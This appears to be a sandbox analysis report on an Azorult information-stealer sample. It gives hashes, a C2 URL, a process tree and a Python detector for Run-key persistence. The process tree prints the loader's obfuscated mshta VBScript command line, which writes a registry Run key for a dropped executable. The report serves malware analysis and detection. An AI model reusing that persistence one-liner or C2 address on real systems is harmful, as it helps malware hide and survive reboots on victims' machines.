Analysis
- max time kernel: 97s
- max time network: 162s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 03-07-2022 05:18
Static task: static1
Behavioral task: behavioral1
- Sample: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Resource: win10v2004-20220414-en
General
- Target: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
- Size: 836KB
- MD5: bab64cf036bc9fd6cc8af20bda3f12e3
- SHA1: 82d47ceefe73b819b0c3dc50460086c090846241
- SHA256: 3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c
- SHA512: ce2f52c4f48c13ac6085446f2089d1668a2c8db136a7b821c6de20791e5f09b7a02db06c2f5333cd365e7235219f4a3edf5f4993a8d56ee25a8a18bd460fd846
Malware Config
Extracted
- Family: azorult
- C2: http://37.72.175.157:8080/chi/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE (1 IoC)
Processes:
  pid 4568  COPENS.exe
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
Processes:
  Key value queried: \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation  (3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe)
-
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes:
  Key created:     \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run  (mshta.exe)
  Set value (str): \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Udskamningens2 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe"  (mshta.exe)
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature calls it likely ransomware behaviour, but this sample is classified above as an information stealer, so drive enumeration here is more consistent with locating files to collect than with encrypting them; nothing else in this report indicates file encryption.
-
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid 1488  3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe
  pid 4568  COPENS.exe
-
Suspicious use of WriteProcessMemory (6 IoCs)
Processes:
  PID 1488 (3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe) wrote to memory of 4564 (mshta.exe), 3 times
  PID 1488 (3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe) wrote to memory of 4568 (COPENS.exe), 3 times
Processes
- C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe (PID 1488, level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\mshta.exe (PID 4564, level 2)
    Command line: "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Udskamningens2"" : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\COPENS.exe"",""REG_SZ"" : window.close")
    Note: the command line names System32\mshta.exe, but the image that ran is SysWOW64\mshta.exe, so the launching sample is a 32-bit process and WOW64 file-system redirection resolved the path. The inline script avoids the literal string "CreateObject": it stores "Set WshShell = CrXXteObject(str1)" in a variable, patches "XX" to "ea" with Replace(), runs the result with execute, and then calls WshShell.RegWrite on the HKCU Run key, with "Udskamningens2" as the value name and the dropped COPENS.exe as the data.
    - Adds Run key to start application
  - C:\Users\Admin\AppData\Local\Temp\COPENS.exe (PID 4568, level 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\COPENS.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
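The "Adds Run key" signature and the mshta.exe command line in the process tree above show the same thing from two sides: the persistence is written by an inline VBScript that never contains "CreateObject" verbatim, so a command-line rule that only greps for that token misses it. The Python below is an added example, not part of the sandbox report or of any vendor tool: it emulates just enough VBScript (string assignment, Replace(), execute, Set ... = CreateObject(...), and a RegWrite method call) to recover the registry write from that command line, then flags it as Run-key persistence. The process-creation events it scans are constructed for the example with PIDs taken from the process tree (1488, 4564, 4568); the event field names and the parent of PID 1488 being unknown are the example's own assumptions.

```python
import re
from typing import Optional

# Command line of mshta.exe as printed in the process tree of this report.
MSHTA_CMDLINE = (
    '"C:\\Windows\\System32\\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : '
    'str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : '
    'execute str2 : myKey = ""HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Udskamningens2"" : '
    'WshShell.RegWrite myKey,""C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe"",""REG_SZ"" : '
    'window.close")'
)

# Constructed process-creation events (the Sysmon-like field names are an assumption);
# PIDs and image paths follow the process tree above, parent of 1488 is unknown.
SAMPLE_EVENTS = [
    {"pid": 1488, "parent_pid": None,
     "image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe",
     "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\3ccae8f9aec35c295f38fc346da2eddedaa3d21ee5dbeb6c5ebd357700e2e72c.exe"'},
    {"pid": 4564, "parent_pid": 1488, "image": "C:\\Windows\\SysWOW64\\mshta.exe", "cmdline": MSHTA_CMDLINE},
    {"pid": 4568, "parent_pid": 1488, "image": "C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe",
     "cmdline": '"C:\\Users\\Admin\\AppData\\Local\\Temp\\COPENS.exe"'},
]

INLINE_VBS = re.compile(r'vbscript:Execute\("(.*)"\)\s*$', re.IGNORECASE | re.DOTALL)
ASSIGN_REPLACE = re.compile(r'^(\w+)\s*=\s*Replace\(\s*(\w+)\s*,\s*"(.*?)"\s*,\s*"(.*?)"\s*\)$', re.IGNORECASE)
ASSIGN_LITERAL = re.compile(r'^(\w+)\s*=\s*"(.*)"$', re.DOTALL)
EXECUTE_VAR = re.compile(r'^execute\s+(\w+)$', re.IGNORECASE)
SET_CREATEOBJECT = re.compile(r'^Set\s+(\w+)\s*=\s*CreateObject\(\s*(.+?)\s*\)$', re.IGNORECASE)
METHOD_CALL = re.compile(r'^(\w+)\.(\w+)\s+(.+)$', re.DOTALL)
RUN_KEY = re.compile(r'\\CurrentVersion\\Run\\', re.IGNORECASE)


def extract_inline_vbscript(cmdline: str) -> Optional[str]:
    """Return the body of a vbscript:Execute("...") argument, or None if absent."""
    m = INLINE_VBS.search(cmdline)
    if not m:
        return None
    # Inside the outer quotes VBScript writes a literal quote as "".
    return m.group(1).replace('""', '"')


def split_outside_quotes(text: str, sep: str) -> list:
    """Split on sep but not inside "..."; a naive split on ':' would cut the
    'C:\\Users\\...' path in the RegWrite argument into two statements."""
    parts, buf, in_str = [], [], False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        if ch == sep and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def emulate_vbscript(script: str) -> dict:
    """Track string variables, objects created via CreateObject and RegWrite calls.
    Only the constructs this loader uses are modelled; anything else is recorded."""
    state = {"vars": {}, "objects": {}, "reg_writes": [], "unhandled": []}

    def value_of(token: str) -> str:
        token = token.strip()
        if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
            return token[1:-1]
        return state["vars"].get(token, token)

    def run(stmt: str) -> None:
        if m := ASSIGN_REPLACE.match(stmt):
            name, src, old, new = m.groups()
            state["vars"][name] = state["vars"].get(src, "").replace(old, new)
        elif m := ASSIGN_LITERAL.match(stmt):
            state["vars"][m.group(1)] = m.group(2)
        elif m := EXECUTE_VAR.match(stmt):
            run(state["vars"].get(m.group(1), ""))  # run the patched second-stage statement
        elif m := SET_CREATEOBJECT.match(stmt):
            state["objects"][m.group(1)] = value_of(m.group(2))
        elif m := METHOD_CALL.match(stmt):
            obj, method, args = m.groups()
            if method.lower() == "regwrite" and state["objects"].get(obj) == "WScript.Shell":
                key, value, kind = (value_of(a) for a in split_outside_quotes(args, ","))
                state["reg_writes"].append((key, value, kind))
            else:
                state["unhandled"].append(stmt)
        else:
            state["unhandled"].append(stmt)

    for stmt in split_outside_quotes(script, ":"):
        run(stmt)
    return state


def scan_events(events: list) -> list:
    """Alert on mshta.exe started with an inline script that writes a Run value."""
    alerts = []
    for ev in events:
        if ev["image"].lower().rsplit("\\", 1)[-1] != "mshta.exe":
            continue
        script = extract_inline_vbscript(ev["cmdline"])
        if script is None:
            continue
        for key, value, _ in emulate_vbscript(script)["reg_writes"]:
            if RUN_KEY.search(key):
                alerts.append({"pid": ev["pid"], "parent_pid": ev["parent_pid"],
                               "technique": "Run-key persistence via mshta inline VBScript",
                               "key": key, "value": value})
    return alerts


if __name__ == "__main__":
    for alert in scan_events(SAMPLE_EVENTS):
        print(alert)
```

Running the block prints one alert for PID 4564 (parent 1488) naming the HKCU Run value Udskamningens2 and the COPENS.exe path. The quote-aware splitter matters: the drive-letter colon in the RegWrite argument would otherwise split the statement and the key/value pair would never be recovered.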
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\COPENS.exe
  Filesize: 836KB (the same size as the submitted sample, but a different hash)
  MD5: 3c98a0d1f58b70aa683bea99b3f92811
  SHA1: bdcae100842c0441de4c8f2ecb5b98ac45a2d139
  SHA256: 6cf67dff757f624106f5355699b1f0f994c02d26f0987ac93fad00ccbab77f2a
  SHA512: 334bf7938e248ce1dc6a1340981a07d1f9367375994748cdf2366e0c4afff3be90a60ec71dac82160d3550c4a0d26a2e1515f3b7d33b105aee84d0efbf3d15d9
- memory/1488-140-0x0000000077AD0000-0x0000000077C73000-memory.dmp  1.6MB
- memory/1488-133-0x0000000077AD0000-0x0000000077C73000-memory.dmp  1.6MB
- memory/1488-132-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmp  2.0MB
- memory/1488-138-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmp  2.0MB
- memory/4564-134-0x0000000000000000-mapping.dmp
- memory/4568-135-0x0000000000000000-mapping.dmp
- memory/4568-143-0x0000000000400000-0x0000000000420000-memory.dmp  128KB
- memory/4568-148-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmp  2.0MB
- memory/4568-149-0x0000000077AD0000-0x0000000077C73000-memory.dmp  1.6MB
- memory/4568-150-0x00007FFD01B10000-0x00007FFD01D05000-memory.dmp  2.0MB
- memory/4568-151-0x0000000077AD0000-0x0000000077C73000-memory.dmp  1.6MB
- memory/4568-152-0x0000000077AD0000-0x0000000077C73000-memory.dmp  1.6MB